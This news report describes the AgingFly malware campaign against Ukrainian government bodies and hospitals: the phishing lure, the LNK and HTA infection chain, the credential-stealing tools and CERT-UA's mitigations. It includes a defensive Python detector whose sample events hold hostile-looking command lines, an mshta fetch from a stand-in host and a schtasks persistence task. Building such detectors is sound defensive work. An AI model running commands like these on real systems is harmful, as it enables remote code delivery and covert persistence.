A novel malware strain, dubbed ‘AgingFly,’ has been spotted in a series of cyberattacks targeting Ukrainian government bodies and hospitals with the goal of stealing authentication data from Chromium-based browsers and the WhatsApp desktop app.
The campaign was uncovered last month by CERT-UA, which linked the activity to a threat cluster tracked as UAC-0247. The cybersecurity agency believes the attacks may also target individuals connected to Ukraine’s Defense Forces.
The attack begins with phishing emails disguised as humanitarian aid offers. Victims are lured into clicking malicious links that redirect either to compromised legitimate websites, abused through cross-site scripting vulnerabilities, or to convincing AI-generated fake pages. From there, targets are prompted to download an archive containing a shortcut (LNK) file that initiates a complex infection chain.
Once executed, the file launches a built-in HTA handler that retrieves additional malicious components. A decoy form is displayed to distract the user while the malware establishes persistence via scheduled tasks and injects shellcode into legitimate processes. In the following stages, encrypted payloads are deployed that establish a reverse shell connection to a command-and-control (C&C) server.
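The chain described above, from shortcut to HTA handler to scheduled task, leaves a recognisable parent-child pattern in process-creation telemetry. As an added example (not code from the article or from CERT-UA), this Python script walks constructed process events and flags an HTA handler started from the desktop shell whose descendants register a scheduled task; the event field names, the sample records and the `aid-form.example` host are assumptions.

```python
from collections import defaultdict

HTA_HANDLER = "mshta.exe"
INDICATORS = {
    "schtasks.exe": "scheduled-task persistence",
    "powershell.exe": "scripted follow-on stage",
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_hta_chains(events):
    """One finding per HTA handler started from the interactive shell.
    events: dicts with pid, ppid, image, cmdline (oldest first); field
    names are an assumption loosely following Sysmon Event ID 1."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    def descendants(pid):
        stack, seen = list(children[pid]), []
        while stack:
            e = stack.pop()
            seen.append(e)
            stack.extend(children[e["pid"]])
        return seen

    findings = []
    for e in events:
        if basename(e["image"]) != HTA_HANDLER:
            continue
        parent = by_pid.get(e["ppid"])
        # explorer.exe as parent is what a double-clicked LNK target looks like
        if parent is None or basename(parent["image"]) != "explorer.exe":
            continue
        hits = [(basename(d["image"]), INDICATORS[basename(d["image"])])
                for d in descendants(e["pid"]) if basename(d["image"]) in INDICATORS]
        if "://" in e["cmdline"]:
            hits.append(("remote-url", "HTA fetched from a remote host"))
        findings.append({"pid": e["pid"], "hits": hits, "score": len(hits)})
    return findings

# Constructed sample chain, not real telemetry: LNK click -> mshta -> schtasks.
SAMPLE = [
    {"pid": 10, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe https://aid-form.example/form.hta"},
    {"pid": 30, "ppid": 20, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\stage.exe"},
]
```

In practice `SAMPLE` would be replaced by a Sysmon Event ID 1 or EDR process-start feed, and the `score` field used to prioritise triage rather than as a hard verdict.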
AgingFly is a C#-based malware capable of remote command execution, file exfiltration, screenshot capture, and keylogging. It communicates with its operators through encrypted WebSocket connections using AES-CBC encryption.
To harvest sensitive data, attackers leverage open-source tools such as ChromElevator to extract cookies and saved passwords from browsers like Chrome, Edge, and Brave without requiring administrator privileges. Additionally, they use ZAPiDESK to decrypt and access data stored by the Windows version of WhatsApp.
The attackers also conduct network reconnaissance and lateral movement using utilities such as RustScan, Ligolo-ng, and Chisel.
One of AgingFly’s most unusual features is its ability to dynamically compile command handlers directly on infected machines using source code delivered from the C&C server. This allows attackers to modify functionality in real time while keeping the initial malware footprint small.
CERT-UA advises organizations to mitigate exposure by blocking the execution of LNK, HTA, and JavaScript files.